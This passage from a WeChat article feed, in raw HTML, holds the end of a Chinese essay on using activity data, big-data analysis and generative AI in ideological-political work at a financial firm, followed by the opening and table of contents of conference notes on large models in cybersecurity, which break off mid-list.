仿宋;color:black;mso-themecolor:text1;mso-ansi-language:EN;">2.</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">大数据分析提升员工反馈评价的可观准确性<o:p></o:p></span></section></li><li><section style="text-indent: 0cm;margin-bottom: 8px;"><span lang="EN" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
仿宋;color:black;mso-themecolor:text1;mso-ansi-language:EN;">3.</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">人工智能实现创新理念的导入和落地<o:p></o:p></span></section></li><li><section style="text-indent: 0cm;margin-bottom: 8px;"><span lang="EN" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
仿宋;color:black;mso-themecolor:text1;mso-ansi-language:EN;">4.</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">数字化开启思想政治工作成效观测的新视野<o:p></o:p></span></section></li></ol><section style="margin-bottom: 8px;"><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">研究结果表明,数字化能够有效辅助金融企业思想政治工作,使之更符合金融业的实际特点和需求。<o:p></o:p></span></section><p><span style="font-size:11.0pt;font-family:黑体;mso-ascii-font-family:&#34;Times New Roman&#34;;mso-hansi-font-family:&#34;Times New Roman&#34;;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">（一）数字化行为监测实现思想动态的实时感知</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
黑体;color:black;mso-themecolor:text1;"><o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">习近平总书记深刻指出：“思想政治工作从根本上说是做人的工作。”思想政治工作是面向人、服务人、团结人、凝聚人的工作，人的思想具有丰富性、多样性、动态性，要做到及时把握员工思想变化,掌握员工思想动态,仍然是一个难点。数字化手段为思想政治工作提供了新的可能。虽然不能直接观测思想,但可以通过监测员工的行为数据,通过数据洞察实现对思想状态的间接捕捉，进而实现思想动态的早期预警和引导。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;"><img class="rich_pages wxw-img" data-imgfileid="100000249" data-ratio="0.3839479392624729" data-type="png" data-w="922" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=eab04a26&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxYls33hcCdtfalkqBs8reBVlCBC1E8rrsclhMic3IjSbEf8vRRN28RwJPAEJd3nE2XNz2nSnrVBuA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
仿宋;color:black;mso-themecolor:text1;">2022</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">年年初,某单位根据新的合规要求,对相关管理制度进行了微调, 当周网络上也出现了个别针对该行业的负面报道。两者叠加，该企业多类办公系统，包括研发系统的活跃度出现了下降（如图</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;">1</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">）。发现这一情况后,企业管理层认识到员工的工作状态变化及其背后可能出现的思想波动，迅速采取行动,详细解释制度调整的原因及合理性,很快各项系统的活跃水平恢复到了正常水平。这说明数字化监测可以提早发现员工思想动态变化,为采取针对性引导措施争取时间,避免负面影响进一步扩大。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">本案例展现了数字化可以由表及里、以小见大，及时洞察员工思想动态，辅助思想政治工作的生动实践。金融劳动产出虽然抽象,但是员工的实际行为从某些侧面能反映出内心的情感或想法。数字化可以捕捉员工使用办公系统、研发系统、工单系统、知识库等各类工作系统的活跃度等数据,通过行为数据映射员工的思想动态，实现思想政治工作的实时感知,进行早期预警和针对性引导,及时化解思想波动带来的潜在风险。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:黑体;mso-ascii-font-family:&#34;Times New Roman&#34;;mso-hansi-font-family:&#34;Times New Roman&#34;;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">（二）大数据分析提升员工反馈评价的客观准确性</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:黑体;color:black;mso-themecolor:text1;"><o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">习总书记指出：“群众路线是我们党的生命线和根本工作路线，是我们党永葆青春活力和战斗力的重要传家宝。”数字化技术的蓬勃发展为新时代走好群众路线、做好员工工作提供了科技化、现代化的创新工具。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">在金融行业日益数字化和专业化的今天,金融专业知识快速迭代、信息科技蓬勃发展，一线员工拥有更多机会直接接触新客户、新需求、新技术等第一手信息，而作为基层思想政治工作排头兵的中间管理岗位人员，更关注内部协调和上级汇报,面临着获取选择性信息、间接信息和滞后信息的风险。在思想政治工作中容易出现管理者和基层员工之间的信息不对称，如果交流过程中管理者的理解和表述与一线实际工作情况差异较大，很难贴近受众、并形成思想共鸣，也无法起到预期效果。以下三个在不同岗位上的简单案例反映了管理人员应用数字化方式和大数据分析工具掌握员工真实工作情况，进行精准反馈评价，实现了良好的思想沟通效果。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;mso-font-kerning:1.0pt;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:AR-SA;">第一个案例体现在问题剖析方面。在某维护团队中，曾有位专注于解决各类技术问题的骨干员工，埋头努力工作，但是精力接近上限，呈现出明显的疲惫感。分析该员工的大数据，发现他同时支持多个项目，加班情况较多，贡献量居前列，但是工作较为零散（如图</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;mso-font-kerning:
1.0pt;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:
AR-SA;">2</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:
&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;mso-font-kerning:1.0pt;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:AR-SA;">）。根据这一情况，其直属管理者在定期谈话过程中，及时肯定他的贡献，并引导他更加聚焦重点工作、突出工作主线，这名员工很快进入新的、更好的状态。</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000250" data-ratio="0.4642082429501085" data-type="png" data-w="922" style="color: black;font-family: 仿宋;font-size: 11pt;letter-spacing: 0.034em;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=1a4888ce&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxYls33hcCdtfalkqBs8reBDZBGfdzxrs5NLjG3fRRKjTCZTUXkVAnBZoWnmumzc7cxrba1o5fZNw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><br/></p><p><o:wrapblock><v:shapetype coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"><v:stroke joinstyle="miter"><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"><v:f eqn="sum @0 1 0"><v:f eqn="sum 0 0 @1"><v:f eqn="prod @2 1 2"><v:f eqn="prod @3 21600 pixelWidth"><v:f eqn="prod @3 21600 pixelHeight"><v:f eqn="sum @0 0 1"><v:f eqn="prod @6 1 2"><v:f eqn="prod @7 21600 pixelWidth"><v:f eqn="sum @8 21600 0"><v:f eqn="prod @7 21600 pixelHeight"><v:f eqn="sum @10 21600 0"></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:formulas><v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"><o:lock v:ext="edit" aspectratio="t"></o:lock></v:path></v:stroke></v:shapetype><v:shape o:spid="_x0000_s1026" type="#_x0000_t75" style="left:0;text-align:left;margin-left:6.95pt;margin-top:411.2pt;width:442.2pt;height:104.45pt;z-index:251668480;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;"><v:imagedata o:title=""><w:wrap type="topAndBottom" anchorx="margin"></w:wrap></v:imagedata></v:shape></o:wrapblock><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">第二个案例体现在员工评价方面。某开发团队负责人反馈，其个人主观上觉得某员工表现突出，但一时也说不出为什么？我们通过查看该员工在研发系统中的代码提交量等工作数据，发现该员工工作很有节律，在具体工作步骤实施前，都会进行规划设计，“谋定后动”(如图</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
仿宋;color:black;mso-themecolor:text1;">3</span><span lang="EN-US" style="font-size:
11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">)，产出质量高，缺陷少，和工作目标吻合。这种工作习惯是隐藏的经验，值得其他员工参考借鉴。<em><o:p></o:p></em></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;"><img class="rich_pages wxw-img" data-imgfileid="100000252" data-ratio="0.23669923995656894" data-type="png" data-w="921" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=bb08ae98&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxYls33hcCdtfalkqBs8reBgRGGJFZh7DeQyqS8H0KwoRQzP69N10B348K7yIvjXzicgktFcTDAUrQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">第三个案例体现在重点员工培养方面。某行业产品研发团队负责人给了高潜力员工更大的工作压力,一段时间后，他十分关心这些员工的专业能力是否得到相对的提升。通过大数据跟踪分析，我们发现他关注的高潜力员工工作交付量明显高于其他员工,已经成长为该领域产能最高的骨干，员工的能力成长得到了可视化验证。数字化的管理工具与科学的人才培养方法相辅相成在加强员工培养、满足员工成长诉求方面发挥了积极作用。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">正如宋朝大诗人陆游说的“功夫在诗外”一样，思想政治工作的功夫，亦在与工作对象的学习讨论、组织活动、谈心谈话、批评建议、奖励诫勉这些“触点”之外，需要积累大量信息，深入了解员工的实际工作情况，并以充分的信息获取和分析为基础，拉近思想距离、巩固交流共识，才能润物细无声地持续做好思想政治工作、走好群众路线，达到预期目的。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:黑体;mso-ascii-font-family:&#34;Times New Roman&#34;;mso-hansi-font-family:&#34;Times New Roman&#34;;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">（三）人工智能实现创新理念的导入和落地</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
黑体;color:black;mso-themecolor:text1;"><o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">金融业的发展历史要求金融从业人员具备较强的国际化视野，不断吸收先进发展经验，但在本土化过程中，如何将外部经验与中国特色结合，如何将创新理念与实际工作结合，真正把“拿来主义”为我所用，成为一个新的命题。而统一发展目标、凝聚发展合力，正是思想政治工作的主要内容之一。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;mso-font-kerning:1.0pt;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:AR-SA;">以某金融单位新型软件产品研发团队为例,相关金融信息系统的研发要求团队兼顾国际先进理念和本土实际，探寻一套具有行业特色、符合该金融细分市场发展要求的系统建设道路。团队经常在理念导入上出现思想碰撞，为化解这些矛盾,团队利用</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;mso-font-kerning:1.0pt;mso-ansi-language:EN-US;mso-fareast-language:
ZH-CN;mso-bidi-language:AR-SA;">AIGC</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;mso-font-kerning:1.0pt;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:AR-SA;">（生成式人工智能）辅助工具,输入近半年的每日例会记录，让人工智能分析并提出优化建议，包括询问团队现状、后续如何优化角色分配、如何调整工作优先顺序、存在哪些问题和风险以及该如何应对等等（如图</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;mso-font-kerning:
1.0pt;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:
AR-SA;">4</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:
&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;mso-font-kerning:1.0pt;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:AR-SA;">）。人工智能结合了团队前期的集体讨论成果，提供的建议中肯可行,容易被团队成员接受，具有一定的借鉴意义，有效发挥了凝聚共识、统一思想的作用。</span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:
&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;mso-font-kerning:1.0pt;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;mso-bidi-language:AR-SA;"><img class="rich_pages wxw-img" data-imgfileid="100000253" data-ratio="0.40825190010857765" data-type="png" data-w="921" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=02caa2b6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxYls33hcCdtfalkqBs8reBa1eM8Y1JumCKYR3ds8x0KpykiaodP3xQo0G5HJKwU9K3ZeEHInPfAkQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">人工智能辅助,提供了一个局外公正的观察视角,利用丰富信息全面分析,避免主观臆断,也避免机械照搬理论。它充分结合本地实际,吸收借鉴国际先进理念的精髓,为团队提供切实可行的建议,化解思想差异,提升团队协作,这是一种新的思想政治工作的思路和工具。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:黑体;mso-ascii-font-family:&#34;Times New Roman&#34;;mso-hansi-font-family:&#34;Times New Roman&#34;;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">（四）数字化开启思想政治工作成效观测的新视野</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:黑体;color:black;mso-themecolor:text1;"><o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">本研究提出成效观测,即面向思想政治工作的对象的工作成效进行观测,是对思想政治工作取得效果的直接评估。可以采用数字化手段收集员工工作行为数据,进行定量分析;也可以通过案例分析、访谈反馈等方式进行定性研究,以客观全面地评估思想政治工作的效果,发现问题、持续改进。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">金融作为保障国计民生的基础性行业，在任何时候任何情况下都必须保证信息系统不停转、确保业务能够顺利开展。在</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;">2022</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">年疫情期间,某金融单位采取远程办公与现场封闭办公相结合的方式，无论是现场值班人员还是远程办公人员都面临着前所未有的压力。为此，在该单位一个接近</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;">20</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">人的团队中，团队负责人调整了工作方式和沟通方式。他明确工作目标,还编写需要的代码框架、接口、模板,为团队成员提供专人专用的极简工作页面，优先解决团队协作瓶颈和规模扩展问题。同时，他坚持每天给团队每个成员至少打一个电话,一对一询问他们生活碰到的困难,并提供力所能及的帮助。这个团队负责人也有所困惑，一直在反思:我的做法对不对?是否真的起到了正向效果?其他团队的管理方式是否更好?我需要调整改进吗?<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;"><img class="rich_pages wxw-img" data-imgfileid="100000254" data-ratio="0.23892773892773891" data-type="png" data-w="858" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=8486608d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxYls33hcCdtfalkqBs8reBEOJXobKicGlvSUGQMphgpqcCJlGAO747OLqoPxia5QiaDnb45ib0op1oMA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">为了评估效果,我们对比分析了</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
仿宋;color:black;mso-themecolor:text1;">2021-2022</span><span style="font-size:
11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">年该团队的数据,发现该团队是少数几个在疫情期间活跃度和产能不降反升的团队（如图</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;">5</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">）。我们还查看了他之前带领的一个团队,他交接之后该团队效能有所下降。此外,我们与团队成员进行了非正式的聊天了解，结合聊天情况询问外部专家进行解读,得出三点结论:一对一关怀满足了疫情下的社交需求;团队负责人展现出公仆式领导（servant leadership）的特征，他非常关心员工的需求,调整工作方式来服务团队,这种管理方式调整非常适时;思想政治工作需要持续投入才能取得效果。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">这个案例中，定量分析与定性研究相结合,可以更全面评估思想政治工作的成效,为后续工作提供借鉴。这个案例的核心，不仅仅在于数字化的工具应用，更在于思想政治工作中敏感的觉察力和服务团队的初心。<o:p></o:p></span></p><p><span style="font-family: 黑体;color: black;font-size: 18px;">四、总结和体会</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
黑体;color:black;mso-themecolor:text1;"><o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">本文通过数字化手段开展了4项针对性强的实证研究,展现出数字技术在创新和支持思想政治工作方面的积极作用,为我们提供了新的视角和更丰富的手段。但是不能因此忽视传统工作与人文关怀的重要性，不能脱离“思想政治工作从根本上说是做人的工作”的本质判断。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">具体来看,数字监测实现实时捕捉思想动态,但核心在于及时化解思想偏差,牢牢守住思想工作的群众路线;大数据分析让我们更懂员工需求,但是交流沟通仍要人性化,体现实事求是的优良作风;人工智能扩大共识,但发展仍需凝聚人心,增强统一思想的力量;成效观测使我们看到思想工作效果,但持续激励仍源自人文关怀,需要弘扬正能量。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">综上所述,技法创新易,精神传承难。我们在运用数字化等新技术的同时,更要坚持经受实践检验的“群众路线”“实事求是”“统一思想”“弘扬正能量”等优秀传统,以人为本,与时俱进，守正创新,在新时代续写金融思想政治工作的新篇章。<o:p></o:p></span></p><p><span style="font-family: 黑体;color: black;font-size: 18px;">参考文献</span><span lang="EN-US" style="font-size:
11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:黑体;color:black;mso-themecolor:text1;"><o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">[1]...“以软件研发的数字孪生，开辟软件产业数字化的新境界”，中国期货业协会微信公众号，</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;">2022.11.11</span><span lang="EN-US" style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;"><o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">[2]...基于数字孪生的软件供应链分析系统及构建方法，中国专利公布公告，申请公布号：</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
仿宋;color:black;mso-themecolor:text1;">CN115712452A</span><span style="font-size:
11.0pt;font-family:仿宋;mso-ascii-font-family:&#34;Times New Roman&#34;;mso-hansi-font-family:
&#34;Times New Roman&#34;;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">，</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;"> 2023.02.24</span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483918">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=362fd702&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483918%26idx%3D1%26sn%3Df0414f7f6762a04a08909e9a3f98981a%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 01 Mar 2024 18:26:00 +0800</pubDate>
    </item>
    <item>
      <title>大模型会踹破我们的专业门槛吗？</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483893&amp;idx=1&amp;sn=4e428bb0f9a2e45aa384295f45409c7d</link>
      <description>信创联盟会议网络安全分享交流的笔记，主题是大模型在安全领域的应用探讨。</description>
      <content:encoded><![CDATA[<p>
<span>千里之行</span> <span>2024-01-25 11:03</span> <span style="display: inline-block;">上海</span>
</p>

<p>信创联盟会议网络安全分享交流的笔记，主题是大模型在安全领域的应用探讨。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=83bc2903&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINzjP65vJM9ahE3Kx8lm98ANr6icscEa0c1LfD7q7cJIUcFcamichBHBr05ldfU8CbZrMbU4L5qWQAsA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;"><span style="color:black;">前天参加了涛哥主持的信创联盟会议网络安全分享交流，主题是</span><span style="color:#FA0000;">大模型在安全领域的应用探讨</span><span style="color:black;">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;"><span style="color:black;">与会的网安专业人士,想必多少和我有同感,面对大模型</span><span style="color:#FA0000;">既抱憧憬又存疑虑</span><span style="color:black;">。我们不断努力突破舒适区,拼搏在陡峭的学习曲线上,以积累专业知识和技能。而这些日积月累,</span><span style="color:#FA0000;">在大模型面前，尚能饭否？</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;"><span style="color:black;">论坛现场隐含了答案，所展示的大模型应用范例,无不从</span><span style="color:#FA0000;">专业领域知识</span><span style="color:black;">出发,通过</span><span style="color:#FA0000;">训练验证</span><span style="color:black;">不断优化模型,以期模型能更好地协助日常运营。似乎是我们需要调整定位，成为技术与模型的</span><span style="color:#FA0000;">融合创新者</span><span style="color:black;">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;"><span style="color:black;">论坛体验很好，</span><span style="color:#FA0000;">知未知，见未见</span><span style="color:black;">，写篇笔记分享一下。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 8pt;"><span style="font-family:Calibri;" lang="en-US">*</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">笔记疏漏错误难免</span><span style="font-family:Calibri;" lang="en-US">,</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">具体内容还请以各位讲者的现场发言为准。</span></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary=""><tbody><tr><td style="border-width: 0pt;vertical-align: top;padding: 2pt 3pt;word-break: break-all;" width="632"><p style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:20.0pt;"><span style="font-weight: bold;font-size: 21px;">目录</span></p></td></tr><tr><td style="border-width: 0pt;vertical-align: top;padding: 2pt 3pt;word-break: break-all;" width="642.3333333333334"><p style="margin:0in;font-size:12.0pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;color:black;" lang="zh-CN">- </span><span style="font-family:&#34;Segoe UI Emoji&#34;;" lang="x-none">❤️</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="x-none">学习感悟</span></p><p style="margin:0in;font-size:12.0pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;color:black;" lang="zh-CN">- </span><span style="font-family:&#34;Segoe UI Emoji&#34;;" lang="x-none">🌟</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="x-none">论坛亮点</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">居然有这么顺溜的科普</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">有同行举着火把在帮大家探路</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">安全垂直领域大模型的光环</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">网络安全要重视大模型飞轮</span></p><p style="margin:0in;font-size:12.0pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;color:black;" lang="zh-CN">- </span><span style="font-family:&#34;Segoe UI Emoji&#34;;" lang="x-none">🎭</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="x-none">主题1：深度伪造技术</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">深度伪造的影响领域</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">技术分类及威胁等级</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">技术原理</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">法律法规</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span 